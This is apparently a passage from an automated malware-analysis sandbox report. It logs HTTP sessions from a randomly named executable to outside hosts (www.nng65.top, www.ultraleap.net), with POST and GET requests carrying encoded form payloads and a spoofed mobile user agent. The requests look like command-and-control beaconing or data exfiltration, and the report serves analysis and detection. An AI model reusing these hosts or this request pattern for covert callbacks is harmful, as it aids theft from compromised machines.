                                      Data Raw: 48 32 79 34 51 32 51 38 3d 48 33 56 78 53 64 4d 73 53 4a 7a 51 62 51 39 54 67 79 4f 62 4e 77 39 48 55 7a 6b 6b 72 36 6b 43 65 58 79 36 61 44 62 69 41 62 52 59 78 6b 69 6c 61 67 70 5a 79 58 4a 2b 4c 33 45 73 6e 4f 55 63 4f 69 46 71 61 54 6a 6c 58 59 50 4a 47 58 49 54 63 74 74 31 66 67 59 68 35 72 66 77 58 31 61 6a 79 4d 31 44 6b 68 52 38 36 78 46 32 78 30 6e 77 71 54 47 71 2f 4b 66 68 2f 73 71 33 74 31 75 71 63 33 42 43 31 33 72 4b 33 2f 64 61 38 52 46 5a 42 6c 69 76 56 63 6d 63 69 6a 57 56 6d 56 6e 4f 32 53 71 43 69 68 52 6d 2b 38 76 6f 4c 58 46 41 76 55 39 55 72 2b 36 45 50 47 5a 4d 53 45 78 37 64 71 62 71 58 4c 64 78 4c 47 74 35 61 72 46 4b 35 63 46 4a 31 30 51 3d
                                      Data Ascii: H2y4Q2Q8=H3VxSdMsSJzQbQ9TgyObNw9HUzkkr6kCeXy6aDbiAbRYxkilagpZyXJ+L3EsnOUcOiFqaTjlXYPJGXITctt1fgYh5rfwX1ajyM1DkhR86xF2x0nwqTGq/Kfh/sq3t1uqc3BC13rK3/da8RFZBlivVcmcijWVmVnO2SqCihRm+8voLXFAvU9Ur+6EPGZMSEx7dqbqXLdxLGt5arFK5cFJ10Q=
                                      Sep 22, 2024 17:37:15.650149107 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:37:15 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.124973738.47.233.65804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:17.191477060 CEST1850OUTPOST /h709/ HTTP/1.1
                                      Host: www.nng65.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nng65.top
                                      Referer: http://www.nng65.top/h709/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 48 33 56 78 53 64 4d 73 53 4a 7a 51 62 51 39 54 67 79 4f 62 4e 77 39 48 55 7a 6b 6b 72 36 6b 43 65 58 79 36 61 44 62 69 41 62 5a 59 32 53 65 6c 62 44 52 5a 7a 58 4a 2b 49 33 45 68 6e 4f 55 37 4f 69 63 6a 61 54 75 65 58 62 33 4a 47 30 51 54 61 63 74 31 4b 51 59 68 78 4c 66 31 59 56 62 70 79 4d 6c 48 6b 68 42 38 36 78 46 32 78 33 2f 77 74 48 53 71 39 4b 66 67 34 73 72 34 37 46 76 39 63 33 5a 38 31 33 2b 33 33 72 70 61 2f 78 56 5a 53 7a 2b 76 49 4d 6d 65 6c 6a 58 41 6d 56 37 4e 32 53 6d 4f 69 67 56 63 2b 37 72 6f 4b 6e 41 6e 32 57 68 4e 39 4e 65 46 62 41 67 72 56 7a 42 72 54 34 37 51 55 72 39 33 59 7a 4e 62 42 36 77 37 38 76 56 56 70 56 57 68 64 67 39 64 42 59 75 6c 6a 64 74 61 72 68 50 67 76 41 6a 6d 4d 7a 65 63 72 48 63 39 30 46 55 63 63 6f 6b 36 36 45 39 69 37 34 52 52 52 58 59 6b 47 43 51 45 57 78 62 78 7a 4f 6e 4a 47 54 78 68 33 38 73 52 39 49 67 6c 56 48 67 34 79 53 4b 77 70 54 56 55 4f 30 63 43 31 63 70 37 7a 53 6e 50 68 6c 6a 30 65 30 6a 67 2f 61 38 51 48 78 67 35 6b [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=H3VxSdMsSJzQbQ9TgyObNw9HUzkkr6kCeXy6aDbiAbZY2SelbDRZzXJ+I3EhnOU7OicjaTueXb3JG0QTact1KQYhxLf1YVbpyMlHkhB86xF2x3/wtHSq9Kfg4sr47Fv9c3Z813+33rpa/xVZSz+vIMmeljXAmV7N2SmOigVc+7roKnAn2WhN9NeFbAgrVzBrT47QUr93YzNbB6w78vVVpVWhdg9dBYuljdtarhPgvAjmMzecrHc90FUccok66E9i74RRRXYkGCQEWxbxzOnJGTxh38sR9IglVHg4ySKwpTVUO0cC1cp7zSnPhlj0e0jg/a8QHxg5kXct+Hw+CHKZWXrFDYPdOm5NjN89Yk2HO3NFfjhpxqJkfduQRufPVcHpAIkpSL/DnP9zc2Pt3Ge2F36jZ/UZXu9Qf88i++jHpdJ2HdXOS2OVzXMEBsPH2/JGt7+8kUhDFCs1UBH1AzMcnvoq5465oJypfz8wOOeSXFR/flwOqz8EOuGOoGSfEhxHHUaDPhz+k+8DMMFi22O41hrVKjgnXCry6c2+AXZf6cdpRj/RLIrEmmmelLxXFzyXUSJtMb4P8CZHLPD0wRJVlNYDyIf0MwTwLOt/gn2U9CQfHee3w9lklWQG83dLY06uI757SZ4p3rmNn+eKq0vrC6VdHzeRGYa7IdNWo2mBgbLjY1EsNIfKIFy1I+sfzHfJ9NMmUDLDWDV17tbwHd4JsZgk1RuMO2ESPGIUSQSuXZ7VBaSn5K1WTxGAe7LthmW5BjOgc93QDhKEzjbSP/3DtIjOWIB3CcZfX0W4abA3Vtv12xavwv3BIj4Ae5q1hwM6FLCfzbDh8zDQ2FQuOjBa1KCYmHj0C30AoHlXZ67q2+EdB+WS6R1hnm2TizswelL9bHdSU03wOuZ3WdpIrMxqN7TKZf0jderZbF3fTEef9VJ04Kvj5FaqsxeZVhF7HZ0HEd2+WVWCe69cBPFkepe827YLcWY/K/uynI1pt0ErcmC [TRUNCATED]
                                      Sep 22, 2024 17:37:18.132462025 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:37:17 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.124973838.47.233.65804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:20.002362967 CEST551OUTGET /h709/?H2y4Q2Q8=K19RRo0+W5bkHzt/kGO1GXdUCAo27ospRE6aVBDVB85mxx/BWRNO7W8tE1ABstUaNhgsM0PXN6LEEUcuV+ABIwVt+cr/SVHjyrZEqxxi7mgW2GmUlGD3zsM=&Bz=dVmT HTTP/1.1
                                      Host: www.nng65.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:37:20.987899065 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:37:20 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.1249739217.70.184.50804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:26.069617033 CEST829OUTPOST /hwgh/ HTTP/1.1
                                      Host: www.ultraleap.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.ultraleap.net
                                      Referer: http://www.ultraleap.net/hwgh/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6b 33 65 46 4b 78 2b 2f 66 4f 6a 41 4b 4e 66 6d 32 74 54 4f 72 38 62 79 52 71 6c 6d 7a 6a 63 4d 51 57 64 2f 48 4b 43 71 4e 53 30 78 64 6a 54 53 75 64 34 63 36 6f 6e 59 6b 38 31 46 65 63 4f 32 50 44 65 6a 30 57 47 61 38 79 64 39 38 65 58 32 54 4b 41 55 44 42 4f 34 58 76 7a 68 6a 70 43 56 72 54 73 74 41 67 65 6b 35 51 54 4f 32 5a 5a 2b 64 5a 76 56 72 4d 74 58 30 54 6b 76 68 73 79 43 5a 4f 6b 2f 6b 6e 6b 65 36 35 36 59 4e 4a 33 4a 6a 58 71 56 44 34 4e 62 6c 41 55 33 30 66 6c 45 57 73 6a 57 6a 73 54 4d 7a 44 57 53 73 4c 68 52 62 75 6c 74 30 55 4a 57 49 48 36 66 75 71 70 39 53 41 3d 3d
                                      Data Ascii: H2y4Q2Q8=k3eFKx+/fOjAKNfm2tTOr8byRqlmzjcMQWd/HKCqNS0xdjTSud4c6onYk81FecO2PDej0WGa8yd98eX2TKAUDBO4XvzhjpCVrTstAgek5QTO2ZZ+dZvVrMtX0TkvhsyCZOk/knke656YNJ3JjXqVD4NblAU30flEWsjWjsTMzDWSsLhRbult0UJWIH6fuqp9SA==
                                      Sep 22, 2024 17:37:26.684700012 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:37:26 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                      Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.1249740217.70.184.50804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:28.631211042 CEST849OUTPOST /hwgh/ HTTP/1.1
                                      Host: www.ultraleap.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.ultraleap.net
                                      Referer: http://www.ultraleap.net/hwgh/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6b 33 65 46 4b 78 2b 2f 66 4f 6a 41 4b 74 50 6d 35 73 54 4f 36 73 62 78 65 4b 6c 6d 6d 54 63 51 51 52 56 2f 48 49 75 36 4e 6b 63 78 64 43 6a 53 76 59 55 63 30 49 6e 59 73 63 31 45 51 38 4f 74 50 44 53 52 30 54 2b 61 38 79 4a 39 38 63 50 32 54 64 30 54 43 52 4f 36 65 50 7a 6a 74 4a 43 56 72 54 73 74 41 6b 2b 4b 35 51 4c 4f 33 6f 4a 2b 64 38 50 53 68 73 74 59 6b 6a 6b 76 71 4d 79 47 5a 4f 6b 5a 6b 69 41 30 36 38 2b 59 4e 4a 48 4a 6a 47 71 57 4e 34 4e 5a 6f 67 56 47 30 61 41 33 4d 73 33 37 71 75 44 4e 37 54 62 79 74 4e 77 4c 45 63 74 37 68 58 64 62 46 51 44 76 6a 70 55 30 4a 4a 46 43 30 50 57 71 70 52 63 35 6b 5a 71 43 7a 64 76 39 65 59 34 3d
                                      Data Ascii: H2y4Q2Q8=k3eFKx+/fOjAKtPm5sTO6sbxeKlmmTcQQRV/HIu6NkcxdCjSvYUc0InYsc1EQ8OtPDSR0T+a8yJ98cP2Td0TCRO6ePzjtJCVrTstAk+K5QLO3oJ+d8PShstYkjkvqMyGZOkZkiA068+YNJHJjGqWN4NZogVG0aA3Ms37quDN7TbytNwLEct7hXdbFQDvjpU0JJFC0PWqpRc5kZqCzdv9eY4=
                                      Sep 22, 2024 17:37:29.379122972 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:37:29 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                      Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.1249741217.70.184.50804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:31.183517933 CEST1862OUTPOST /hwgh/ HTTP/1.1
                                      Host: www.ultraleap.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.ultraleap.net
                                      Referer: http://www.ultraleap.net/hwgh/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6b 33 65 46 4b 78 2b 2f 66 4f 6a 41 4b 74 50 6d 35 73 54 4f 36 73 62 78 65 4b 6c 6d 6d 54 63 51 51 52 56 2f 48 49 75 36 4e 6b 6b 78 64 78 72 53 75 2f 41 63 31 49 6e 59 6d 38 31 42 51 38 50 2f 50 44 4b 56 30 54 37 68 38 77 78 39 39 35 54 32 45 5a 6f 54 4d 52 4f 36 54 76 7a 75 6a 70 43 6c 72 54 38 70 41 67 61 4b 35 51 4c 4f 33 72 42 2b 55 4a 76 53 6e 73 74 58 30 54 6b 6a 68 73 79 75 5a 4f 64 69 6b 6a 42 42 35 49 4b 59 4f 70 58 4a 6c 30 43 57 42 34 4e 68 72 67 56 65 30 61 45 6f 4d 74 62 42 71 76 6d 6f 37 51 37 79 76 6f 4e 67 62 64 6f 73 30 56 5a 4b 47 54 6e 4c 72 72 49 50 4a 4f 31 71 7a 4e 53 2b 37 69 6b 37 71 6f 61 4c 32 2b 33 43 4b 63 64 64 53 61 44 2b 31 75 7a 47 56 6a 38 45 76 43 6c 71 67 30 59 4b 65 4b 4b 71 4e 75 6a 79 52 4d 2f 76 57 5a 2b 52 2f 54 6a 70 65 77 2f 59 62 6d 6d 41 78 46 30 71 4a 35 69 53 4b 44 6b 33 47 4f 5a 78 73 30 70 2b 77 56 46 67 55 6f 71 57 64 6c 6e 6e 6a 58 71 52 44 33 2b 70 66 49 6b 50 34 66 4a 2b 7a 7a 41 63 49 4b 4b 75 47 66 4d 44 30 33 50 73 6e [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=k3eFKx+/fOjAKtPm5sTO6sbxeKlmmTcQQRV/HIu6NkkxdxrSu/Ac1InYm81BQ8P/PDKV0T7h8wx995T2EZoTMRO6TvzujpClrT8pAgaK5QLO3rB+UJvSnstX0TkjhsyuZOdikjBB5IKYOpXJl0CWB4NhrgVe0aEoMtbBqvmo7Q7yvoNgbdos0VZKGTnLrrIPJO1qzNS+7ik7qoaL2+3CKcddSaD+1uzGVj8EvClqg0YKeKKqNujyRM/vWZ+R/Tjpew/YbmmAxF0qJ5iSKDk3GOZxs0p+wVFgUoqWdlnnjXqRD3+pfIkP4fJ+zzAcIKKuGfMD03PsnD7oPWoNXsz3Tdqn8bj8VvVAPgSgBLc6XbmEfNJTqKY0DuGjEB0O0UInOt+T1/SBWOsAgXUIxBKpNs6GpjpQY4vnWiN7pr5q9OrsiGX+jqdgKPdpAX4qpMlmKX2RnDWBhvKWz+J/HNlHFFXUX9qmdqQQRZaMAOJhwYnmxL4+Px0rSmoDF2fLEVwbc++YJ3kEIkFPU7W3B2aiWTMAfoPWFBFGk8vaDrAGiayymebGTyxjW4EeIpkfBhH3rR7HxlO2M1Gt9hs0HWYkWGYuWVaeWIVf+O3nR2M6QRy+l26C5lRv76xZgQXsSVYDV1iTkw5XZL1X/ZNRKtWcGGL+3v/Cfsa5cDMvVKTipVU9epnZBq8pYKIYhlhVL6yhmWGGIiT+SszqVkkbwn430bF4dUgieIylMD6pVgRJVzeeVw/87f/pt+CxvOQKkIcVk6jGTIleCxje5ZdRzoUIDx6Graoq7GjawsJpJCIj2EjyUF0jKbXQSsnBD/EFAiCgigF+yHWMJfcTs7SOaJHntJipQ4CSxRe42pr9mBkZsuaJsytKd/zD8UtB9KPPFEYl81t/Ot9Itsgzne+aUwyAVPmwFP45fZmvyEDfj0qYHQ/WnOnvY1g7SLg4UbIEoHfu3A/J3eujW6X7UPAC6PwT6BER6SdsadUXvhACcYysfmB [TRUNCATED]
                                      Sep 22, 2024 17:37:31.889698982 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:37:31 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
